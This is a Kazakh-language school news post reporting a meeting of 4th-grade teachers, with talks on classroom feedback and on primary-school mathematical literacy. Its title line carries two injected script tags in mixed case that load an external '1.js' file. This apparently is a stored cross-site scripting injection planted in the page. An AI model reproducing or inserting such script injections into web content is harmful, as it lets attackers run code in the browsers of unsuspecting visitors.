4 - сыныптар бірлестігінің отырысы.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.04.2022

2022 жылдың 4-сәуір айында Қоянды 1 ЖОББМ мектебінің  4-сынып мұғалімдерімен  әдістеме  бірлестігінің отырысы өтті. 
Жылдық жоспар негізінде құрылған отырыста өзекті мәселелер талқыланып, алдағы уақытқа жоспар құрылды. 
  Әдістемелік бірлестік отырысында Абай Алтынай " Сабақта тиімді кері байланысты ұйымдастырудың әдіс- тәсілдері " тақырыбында баяндама оқыды. Баяндамада тиімді әдіс- тәсілдер талданды. Мұғалімдер топта кері байланыс беріп,талқылады. 
Екінші баяндама бастауыш сынып мұғалімі Мухамеджанова Маржан оқыды. Тақырыбы өте өзекті   "Бастауыш сыныпта математикалық сауаттылықты қалыптастыру және дамыту". Баяндамада 4-сынып оқушыларының математика пәні бойынша әр түрлі есептерді тиімді түсіндіру, математикалық сауаттылықтарын дамытуға арналған болды. Математика пәні 3-4 - тоқсандарда күрделі есептерден құрылған болғандықтан топтық ,жұптық,жеке тапсырмаларды оқушыларға саралап орындату жүйесі талқыланды. 
Сонымен қатар мұғалімдердің кәсіби біліктіліктерін жетілдіру ,аттестациядан өту туралы айтылды.

Просмотров: 427


Пікір қосу



Деректерді қолтаңбаға қосу